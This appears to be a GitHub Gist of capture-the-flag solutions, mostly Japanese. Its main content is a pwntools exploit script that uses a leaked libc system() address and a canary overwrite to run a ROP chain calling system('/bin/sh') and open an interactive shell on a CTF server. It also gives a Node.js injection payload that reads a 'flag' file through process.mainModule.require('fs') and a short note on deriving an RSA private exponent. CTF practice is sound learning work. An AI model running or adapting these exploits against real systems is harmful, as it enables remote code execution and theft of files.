$ ed - 1 = k(p-1)(q-1) $ になるはずなので、pow(e, -1, (p-1)(q-1))
が計算できる
Last active
April 15, 2024 08:05
-
-
Save moratorium08/4eb38fca677a8cb01afab028d2354394 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from __future__ import division, print_function | |
import random | |
from pwn import * | |
import argparse | |
import time | |
context.log_level = 'error' | |
parser = argparse.ArgumentParser() | |
parser.add_argument( | |
"--host", | |
default="127.0.0.1", | |
help="target host" | |
) | |
parser.add_argument( | |
"--port", | |
default=3001, | |
help="target port" | |
) | |
parser.add_argument( | |
'--log', | |
action='store_true' | |
) | |
parser.add_argument( | |
'--is-gaibu', | |
action='store_true' | |
) | |
args = parser.parse_args() | |
log = args.log | |
is_gaibu = args.is_gaibu | |
if is_gaibu: | |
host = "challenge.ctf.hakatashi.com" | |
port = 27777 | |
else: | |
host = args.host | |
port = args.port | |
def wait_for_attach(): | |
if not is_gaibu: | |
print('attach?') | |
raw_input() | |
def just_u64(x): | |
return u64(x.ljust(8, b'\x00')) | |
r = remote(host, port) | |
def recvuntil(x, verbose=True): | |
s = r.recvuntil(x) | |
if log and verbose: | |
print(s) | |
return s.strip(x) | |
def recv(n, verbose=True): | |
s = r.recv(n) | |
if log and verbose: | |
print(s) | |
return s | |
def recvline(verbose=True): | |
s = r.recvline() | |
if log and verbose: | |
print(s) | |
return s.strip(b'\n') | |
def sendline(s, verbose=True): | |
if log and verbose: | |
pass | |
#print(s) | |
r.sendline(s) | |
def send(s, verbose=True): | |
if log and verbose: | |
print(s, end='') | |
r.send(s) | |
def interactive(): | |
r.interactive() | |
#################################### | |
def menu(choice): | |
recvuntil(b':') | |
sendline(str(choice)) | |
# receive and send | |
def rs(s, new_line=True, r=b':'): | |
recvuntil(r) | |
s = str(s) | |
if new_line: | |
sendline(s) | |
else: | |
send(s) | |
recvuntil(b"System() Address is ") | |
system_addr = int( recvline(), 16) | |
if is_gaibu: | |
libc_base = system_addr - 0x50d70 | |
pop_rdi = libc_base + 0x2a3e5 | |
ret_addr = pop_rdi + 1 | |
binsh_addr = libc_base + 0x1d8678 | |
nazo_addr = libc_base + 0x21c000 | |
else: | |
libc_base = system_addr - 0x50d70 | |
pop_rdi = libc_base + 0x2a3e5 | |
ret_addr = pop_rdi + 1 | |
binsh_addr = libc_base + 0x1d8678 | |
nazo_addr = libc_base + 0x21c000 | |
#nazo_addr = libc_base + 0x24b748 | |
#canary = b"A" * (0x29758 + 8) | |
target = 0x29748 | |
x = 0x8 | |
canary = b"\x00" * (target - x) + p64(nazo_addr) + p64(0)*4 | |
#canary = b"A" * (0x2+a 8) | |
recvuntil(b">") | |
sendline(canary) | |
payload = [ | |
pop_rdi, | |
binsh_addr, | |
ret_addr, | |
system_addr | |
] | |
payload = b''.join(map(p64, payload)) | |
wait_for_attach() | |
recvuntil(b">") | |
#sendline(payload) | |
gomi = p64(0) * 7 | |
sendline(gomi + payload) | |
interactive() |
process.mainModule.require('fs').readFileSync('flag')
をname、roleをx
に設定したオブジェクト{"name": ..., "role": "x"}
をidとして渡すと、${id}.name
や ${id}.role
がいい感じになり、フラグが読める
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment